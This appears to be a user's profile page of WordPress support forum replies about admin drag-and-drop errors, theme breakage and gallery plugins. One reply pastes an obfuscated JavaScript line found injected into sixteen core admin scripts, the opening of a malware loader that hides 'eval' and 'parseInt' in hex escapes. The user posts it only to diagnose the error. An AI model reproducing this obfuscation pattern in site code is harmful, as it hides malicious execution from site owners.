Pafruu
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Cant click and drag in adminGreat, I looked into it and netfirms just told me that they do not support mod_pagespeed
Forum: Fixing WordPress
In reply to: Cant click and drag in adminI still cannot drag stuff around in the menus?? I tried in a different browser and I still get the same error??
Im not sure what else to try.
Which browser are you using?
Forum: Fixing WordPress
In reply to: Cant click and drag in adminForum: Fixing WordPress
In reply to: Cant click and drag in adminThank you for your reply,
after reading and searching here is what I found out.
It is a javascript error.
– I am using chrome as browser
– SCRIPT_DEBUG did not fix the error
– The error message I get is this:Uncaught SyntaxError: Unexpected token ILLEGAL
– the location of this error is found on 16 different locations:
jquery.js:12
utils.js:12
jquery.ui.core.min.js:12
jquery.ui.widget.min.js:12
jquery.ui.mouse.min.js:12
jquery.ui.sortable.min.js:12
jquery.ui.draggable.min.js:12
jquery.ui.droppable.min.js:12
wp-ajax-response.js:12
jquery.color.min.js:12
wp-lists.js:12
postbox.js:12
nav-menu.js:12
admin-bar.js:12
hoverIntent.js:12
common.js:12– here is what is declared in line 12 :
var RMHGz;var yIiC;function SiFT(){var mgdKe=\'XppNgi\';if(\'DMVIn\'==\'qqJXy\')uTWX();}var XkWW;var LKxhI=\".....\";var ZgpLK=\'FGuLm\';if(\'LelSQP\'==\'lzdEyO\')cVsCKt=\'KdokEd\';var PUfqsdQET=\"parseI\\x6et\";var jcLGO;var BlAHSiu=\"e\\x76al\";function FOMKs(){}function mUkKus(){var ncuhtn=\'cefwsD\';if(\'fEPDA\'==\'erdJRE\')otbOsQ();}
I do not have the slightest idea as to how to fix this, please help me
Forum: Fixing WordPress
In reply to: Website admin coming out blankThank you for that. Turns out that when I change the theme to “-old” I could access the dashboard again.
Forum: Plugins
In reply to: [My Calendar - Accessible Event Manager] Seeing DoubleThank you Joe and thank you esmi, I will go have a look on the developers page.
Forum: Plugins
In reply to: [My Calendar - Accessible Event Manager] Seeing DoubleThe theme is called striking, Im using the provided child-theme that comes with it
Forum: Plugins
In reply to: [My Calendar - Accessible Event Manager] Seeing Doublethe url is this: https://www.remimagic.com/schedule/
Forum: Themes and Templates
In reply to: Fatal error: Class 'Theme_Metabox_With_Tabs' not foundI need to upgrade the theme since I get a cheatin’ uh? error message when uploading media.
Any help or suggestions would be appreciated
Forum: Plugins
In reply to: excluding images from nextgen gallery slideshow widgetNah, couldn’t find a solution to the problem. I had to remove the images that I didn’t want in the slideshow from the gallery all together.
Forum: Themes and Templates
In reply to: Language switching from one site to the otheris this how I should do it??
<?php (is_page( 4 ) { echo('<a href=\"https://www.eastcoastsextherapy.com/test\">English</a>');}) ?>
Forum: Themes and Templates
In reply to: Language switching from one site to the otherOk i found out about the condition is_page () but how do I use it??
Forum: Plugins
In reply to: excluding images from nextgen gallery slideshow widgetI guess what I am looking for is for some kind of filter for the slideshow. Telling it to exclude this and this gallery or this and this picture
Forum: Plugins
In reply to: excluding images from nextgen gallery slideshow widgetDoes anyone have any suggestions in regards of this matter? I’d really like to be able to do this.
Forum: Plugins
In reply to: NextGen slideshow widgetok I removed the flash in the slideshow options and it works now.